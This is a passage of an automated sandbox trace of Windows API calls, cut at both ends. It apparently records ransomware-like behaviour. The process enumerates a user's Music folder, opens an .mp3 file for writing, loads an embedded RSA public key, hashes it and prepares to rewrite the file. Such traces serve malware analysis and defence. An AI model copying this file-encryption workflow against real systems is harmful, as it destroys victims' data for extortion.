0x2ac3dd0 [0194.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.914] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\") returned="26hKDH\\" [0194.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2380 [0194.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.914] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0194.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2380 | out: hHeap=0x2c0000) returned 1 [0194.914] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0194.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.915] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.915] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.915] PathFindFileNameW (pszPath="") returned="" [0194.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.915] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\*" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0194.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.916] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.916] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274a8bd0, ftCreationTime.dwHighDateTime=0x1d89ab3, ftLastAccessTime.dwLowDateTime=0xc09bf590, ftLastAccessTime.dwHighDateTime=0x1d89aee, ftLastWriteTime.dwLowDateTime=0xc09bf590, ftLastWriteTime.dwHighDateTime=0x1d89aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dhVO", cAlternateFileName="")) returned 1 [0194.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0194.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0194.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40630 | out: hHeap=0x2c0000) returned 1 [0194.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.916] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf6e80, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x90c53170, ftLastAccessTime.dwHighDateTime=0x1d89ef8, ftLastWriteTime.dwLowDateTime=0x90c53170, ftLastWriteTime.dwHighDateTime=0x1d89ef8, nFileSizeHigh=0x0, nFileSizeLow=0x54c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5cha-37fB.mp3", cAlternateFileName="L5CHA-~1.MP3")) returned 1 [0194.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0194.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0194.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.917] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\l5cha-37fB.mp3") returned=".mp3" [0194.917] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\l5cha-37fB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\l5cha-37fb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.918] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=21696) returned 1 [0194.918] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.921] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x549a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.921] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.923] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.923] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x54c0, lpOverlapped=0x0) returned 1 [0194.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.924] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.925] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.925] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.925] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.925] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.925] GetLastError () returned 0x0 [0194.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.925] GetLastError () returned 0x0 [0194.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.926] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.926] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.926] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.926] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.926] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54c0) returned 0x2af5168 [0194.927] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2380 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2338 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.928] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0194.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.928] RtlAllocateHeap 